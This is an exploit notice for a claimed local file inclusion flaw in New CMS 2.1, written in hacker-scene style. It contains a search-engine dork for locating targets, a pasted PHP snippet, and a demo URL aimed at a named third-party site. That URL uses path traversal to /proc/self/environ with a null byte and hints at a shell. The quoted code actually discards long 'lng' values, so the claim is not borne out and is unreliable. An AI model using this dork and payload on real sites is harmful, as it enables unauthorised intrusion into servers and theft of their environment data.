===============================================

[+] TITLE    : NEW CMS Local File Inclusion Vulnerability (/proc/self/environ) 
[+] VENDOR    : http://new-cms.org/index.php?lng=it&mod=download&pg=indice
[+] VERSION    : 2.1 or Later
[+] AUTHOR    : R3vanBastard
[+] TESTED ON  : Windows
[+] DORK     : "New CMS" inurl:index.php?lng=
[+] YM      : revan_blezinsky[at]yahoo.com

==================[+]VULN[+]===================
if (get_magic_quotes_gpc()) {
    $process = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
    while (list($key, $val) = each($process)) {
        foreach ($val as $k => $v) {
            unset($process[$key][$k]);
            if (is_array($v)) {
                $process[$key][stripslashes($k)] = $v;
                $process[] = &$process[$key][stripslashes($k)];
            } else {
                $process[$key][stripslashes($k)] = stripslashes($v);
            }
        }
    }
    unset($process);
}

define("PER", "");
include(PER."cdat.php");
include(PER."struttura/funzioni.str"); //inclusione file con le funzioni e costanti principali
include(CGEN."config".DTB); // inclusione file di configurazione

if(strlen(dirname($_SERVER["SCRIPT_NAME"]))>1) { $DirName = dirname($_SERVER["SCRIPT_NAME"])."/"; } else { $DirName = "/"; }
$sito[2] = "http://".$_SERVER["SERVER_NAME"].$DirName;
$CMSVersion = "New-CMS 2.1";

if(isset($_GET['mod'])) $_GET['mod'] = Prot($_GET['mod']);
if(isset($_GET['pg']))  $_GET['pg']  = Prot($_GET['pg']);
if(isset($_GET['s']))   $_GET['s']   = Prot($_GET['s']);
if(isset($_GET['lng'])) {  
if(strlen($_GET['lng'])>2) unset($_GET['lng']);
}
============================================================

[DEMO] http://www.salvatorecotena.it/index.php?lng=../../../../../../../../../../../../../proc/self/environ%0000 [shell? ]

===================================================================

Thanks to:   My PC | Jogjamakeup.com | Mainhack |VOP CREW| Jack | rdnc.or.id | 
      BoBy a.k.a c0li(yg botnya di gangbang)

===================================================================